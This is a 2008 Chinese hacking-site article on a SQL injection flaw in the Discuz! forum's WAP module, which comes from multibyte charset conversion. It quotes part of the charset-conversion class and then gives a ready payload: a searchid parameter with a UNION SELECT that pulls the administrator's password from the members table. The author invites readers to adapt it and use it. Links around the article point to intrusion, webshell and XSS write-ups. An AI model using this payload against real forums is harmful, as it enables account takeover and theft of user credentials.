·	Discuz!论坛wap功能模块	08-06	·	设计安全的文件上传功能	08-06
·	vbs版的sql查询分析器	08-06	·	偷改账号 Windows Serve	08-05
·	龙西互联提供50M/ftp/AS	08-05	·	在Vista系统中给收藏夹多	08-04
·	玩转Windows Vista系统中	08-04	·	三维免费空间提供100-60	08-04
·	为程序设置快捷启动键提	08-03	·	ADSL本地连接受限	08-03
·	瑞安信息网提供100M/asp	08-03	·	教你彻底禁止暴风影音后	08-02
·	手把手教你如何让系统在	08-02	·	闪耀数据中心提供200MB免	08-02
·	让WindowsXP不再出现内存	08-01	·	HWay V3.0的使用教程	08-01
·	读取Serv-U管理员密码的	08-01	·	无ARP欺骗的嗅探技术	08-01
·	WebSniff 1.0	08-01	·	体验ImageX 玩转系统映像	08-01
·	免费试用千元网络储存器	08-01	·	云南数据港再次免费送出	08-01
·	601网络技术论坛提供160	08-01	·	QQ文件及文件夹的一些小	07-31
·	EXE程序不能执行时的修复	07-31	·	FileQube提供支持外链的	07-31
·	亚臣网络提供100M/ftp全	07-31	·	豆丁网提供免费在线文档	07-30

[推荐]Discuz!论坛wap功能模块编码的注入漏洞

荐 ★★★★★

Discuz!论坛wap功能模块编码的注入漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-8-6 10:51:26

由于发在blog上的漏洞资料给一位牛牛搞了.官方已出补丁.(由于 PHP 对多字节字符集的支持存在问题，在各种编码相互转换过程中，有可能引发程序溢出和程序错误)
我很生气, 在这我说下过程:

以下是引用片段：
if(defined(’IN_DISCUZ’)) {
exit(’Access Denied’);
}
define(’CODETABLE_DIR’, DISCUZ_ROOT.’./include/tables/’);
class Chinese {
var $table = ’’;
var $iconv_enabled = false;
var $unicode_table = array();
var $config = array
(
’SourceLang’ => ’’,
’TargetLang’ => ’’,
’GBtoUnicode_table’ => ’gb-unicode.table’,
’BIG5toUnicode_table’ => ’big5-unicode.table’,
);
function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {
$this->config[’SourceLang’] = $this->_lang($SourceLang);
$this->config[’TargetLang’] = $this->_lang($TargetLang);
if(!function_exists(’iconv’) && $this->config[’TargetLang’] != ‘BIG5′ && !$ForceTable) {
$this->iconv_enabled = true;
} else {
$this->iconv_enabled = false;
$this->OpenTable();
}
}
function _lang($LangCode) {
$LangCode = strtoupper($LangCode);
if(substr($LangCode, 0, 2) == ‘GB’) {
return ‘GBK’;
} elseif(substr($LangCode, 0, 3) == ‘BIG’) {
return ‘BIG5′;
} elseif(substr($LangCode, 0, 3) == ‘UTF’) {
return ‘UTF-8′;
} elseif(substr($LangCode, 0, 3) == ‘UNI’) {
return ‘UNICODE’;
}
}
function _hex2bin($hexdata) {
for($i=0; $i < strlen($hexdata); $i += 2) {
$bindata .= chr(hexdec(substr($hexdata, $i, 2)));
}
return $bindata;
}
chinese.class.php (utf-8不能利用)
searchid=22%cf’UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit

以上各位自己修改去用吧!

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：百度跨站漏洞谢幕篇

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

实例讲解跨站入侵攻防战之攻击篇	05-08
对偶偶娱乐分站服务器的安全检测	04-23
入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26

Web Wiz Guide论坛后台拿webshell
跨站跨到了主页里,解析云网论坛最新漏洞
星河互动免费论坛申请
FreeBBS免费Discuz!论坛申请
phpwind、DZ论坛XSS跨站漏洞0DAY
Edit board免费论坛申请
轻易绕过PhpWind论坛程序高危漏洞攻防详
Boardster免费phpBB论坛申请
雅虎群组免费论坛申请
Discuz 5.0 0day + PM短信饶过方法
Forumable免费Discuz!论坛申请
跨站通杀漏洞:支持最新的phpwind等论坛